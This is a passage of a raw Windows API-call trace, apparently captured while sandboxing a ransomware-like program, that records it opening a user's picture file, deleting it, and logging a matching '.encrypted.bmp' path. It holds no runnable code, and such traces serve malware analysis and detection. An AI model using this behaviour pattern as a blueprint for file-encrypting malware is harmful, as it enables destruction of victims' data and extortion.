HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.893] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.893] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.893] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.894] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.894] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\k_hrf3du.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.895] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.895] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.895] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.895] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.895] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.896] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.896] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.896] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.896] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.896] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFilePart=0x0) returned 0x63 [0039.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x177e01c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0x7c2100 [0039.897] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\k_hrf3du.bmp")) returned 1 [0039.898] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1552e0, ftCreationTime.dwHighDateTime=0x1d5bb38, ftLastAccessTime.dwLowDateTime=0x7e736a90, ftLastAccessTime.dwHighDateTime=0x1d5ba54, ftLastWriteTime.dwLowDateTime=0x177e01c0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14127, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="K_hrf3du.bmp", cAlternateFileName="")) returned 0 [0039.898] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.899] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.899] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.899] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.899] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.899] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.900] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.900] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0039.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.900] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2b2c, lpOverlapped=0x0) returned 1 [0039.900] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2b2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.900] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0039.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.encrypted.bmp\r\n", cchWideChar=112, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 112 [0039.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.encrypted.bmp\r\n", cchWideChar=112, lpMultiByteStr=0x7db378, cbMultiByte=112, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 112 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.901] WriteFile (in: hFile=0x140, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x6f, lpOverlapped=0x0) returned 1 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.901] CloseHandle (hObject=0x140) returned 1 [0039.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.906] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.906] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.907] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.907] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.907] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.907] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.907] 